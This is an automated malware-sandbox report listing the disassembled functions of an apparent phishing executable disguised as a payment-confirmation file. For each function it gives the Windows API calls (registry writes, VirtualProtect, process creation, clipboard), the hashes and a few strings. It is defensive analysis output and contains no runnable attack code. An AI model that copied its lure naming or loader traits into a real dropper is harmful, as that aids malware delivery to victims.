Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D

Function 0040651D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 00406546

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: eb898ae1b777051f051c4ab58df26dcf4e878c8f9f4a5c47b005eb973d4bb03b
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: 75E0E6B2010109BEEF095F50EC0AD7F371DE708710F11452EF906D4051E6B5E9309A39

Function 00406224 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0040F4A1,0040CEF0,0040357E,0040CEF0,0040F4A1,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9

Function 004061F5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4

Function 6E312A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6E31505C,00000004,00000040,6E31504C), ref: 6E312A9D

Memory Dump Source

Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true

Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ef72df8d4a49dd62481ace65d5a1d2c49d301827c9acb5e8c9ceabf48eddf8ce
Instruction ID: 142177cdc1b4aacaedd7767fa65ac1e9b56a13bf4190a972eb03bc6536bd90c5
Opcode Fuzzy Hash: ef72df8d4a49dd62481ace65d5a1d2c49d301827c9acb5e8c9ceabf48eddf8ce
Instruction Fuzzy Hash: F3F0AEF0929A80FECB90CFE8C4467893BE8B70A305B2585EEE188DAA40E3344544DB91

Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749

Function 004064EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040657D,?,00421F28,?,?,Call,?,00000000), ref: 00406513

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59

Function 004035FD Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 6E312B98 Relevance: 1.4, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 6E312C57

Memory Dump Source

Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true

Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ae4fbd98a1c8b6f3efca96e6b7e7063e8dc1f5a93261f67bfe51b13e7c43e457
Instruction ID: e324842c8f55f60660453e5b26e5fab6bb9fac03987de5fa345aa17666e89610
Opcode Fuzzy Hash: ae4fbd98a1c8b6f3efca96e6b7e7063e8dc1f5a93261f67bfe51b13e7c43e457
Instruction Fuzzy Hash: 04416DB1908604AFDF189FE4DA86BD937BCEB47318F3088ADE905C7510DB399581EB91

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
Opcode Fuzzy Hash: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E

Function 6E3112BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,6E3112DB,?,6E31137F,00000019,6E3111CA,-000000A0), ref: 6E3112C5

Memory Dump Source

Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true

Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 149508f7d0f4d213c616066472fbb1315439536c5bf82696d934cba4c01ec7b6
Instruction ID: 162278ab59fdabd5c5363de6dd921f75d4590700bb86007502c92a6e4b487c7f
Opcode Fuzzy Hash: 149508f7d0f4d213c616066472fbb1315439536c5bf82696d934cba4c01ec7b6
Instruction Fuzzy Hash: 5DB012B0A00400AFEE00CB54DC0BF74325CF701304F24008CB600C2440C1204C00C624

Non-executed Functions

Function 00405846 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004058A4
GetDlgItem.USER32(?,000003EE), ref: 004058B3
GetClientRect.USER32(?,?), ref: 004058F0
GetSystemMetrics.USER32(00000002), ref: 004058F7
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
ShowWindow.USER32(?,00000008), ref: 00405993
GetDlgItem.USER32(?,000003EC), ref: 004059B4
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
GetDlgItem.USER32(?,000003F8), ref: 004058C2

Part of subcall function 00404636: SendMessageW.USER32(00000028,?,?,00404461), ref: 00404644

GetDlgItem.USER32(?,000003EC), ref: 00405A06
CreateThread.KERNEL32(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
CloseHandle.KERNEL32(00000000), ref: 00405A1B
ShowWindow.USER32(00000000), ref: 00405A3F
ShowWindow.USER32(?,00000008), ref: 00405A44
ShowWindow.USER32(00000008), ref: 00405A8E
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
CreatePopupMenu.USER32 ref: 00405AD3
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
GetWindowRect.USER32(?,?), ref: 00405B07
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
OpenClipboard.USER32(00000000), ref: 00405B68
EmptyClipboard.USER32 ref: 00405B6E
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
GlobalLock.KERNEL32(00000000), ref: 00405B84
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
CloseClipboard.USER32 ref: 00405BC9

Strings

{, xrefs: 00405AAC
H/B, xrefs: 00405B34

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H/B${
API String ID: 590372296-332483393
Opcode ID: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
Opcode Fuzzy Hash: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68

Function 00404AF2 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B41
SetWindowTextW.USER32(00000000,?), ref: 00404B6B
SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
CoTaskMemFree.OLE32(00000000), ref: 00404C27
lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C59
lstrcatW.KERNEL32(?,Call), ref: 00404C65
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77

Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9

Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
Part of subcall function 00406930: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA

GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,?,00420F18,?,?,000003FB,?), ref: 00404D3A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55

Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B

Strings

Call, xrefs: 00404C53, 00404C58, 00404C63
H/B, xrefs: 00404BEF
A, xrefs: 00404C15
user32::EnumWindows(i r1 ,i 0), xrefs: 00404B0B
C:\Users\user\eftermodnendes\ringeagt, xrefs: 00404C42

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\eftermodnendes\ringeagt$Call$H/B$user32::EnumWindows(i r1 ,i 0)
API String ID: 2624150263-2177096811
Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D

Function 6E311BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E3112BB: GlobalAlloc.KERNELBASE(00000040,?,6E3112DB,?,6E31137F,00000019,6E3111CA,-000000A0), ref: 6E3112C5

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6E311D2D
lstrcpyW.KERNEL32(00000008,?), ref: 6E311D75
lstrcpyW.KERNEL32(00000808,?), ref: 6E311D7F
GlobalFree.KERNEL32(00000000), ref: 6E311D92
GlobalFree.KERNEL32(?), ref: 6E311E74
GlobalFree.KERNEL32(?), ref: 6E311E79
GlobalFree.KERNEL32(?), ref: 6E311E7E
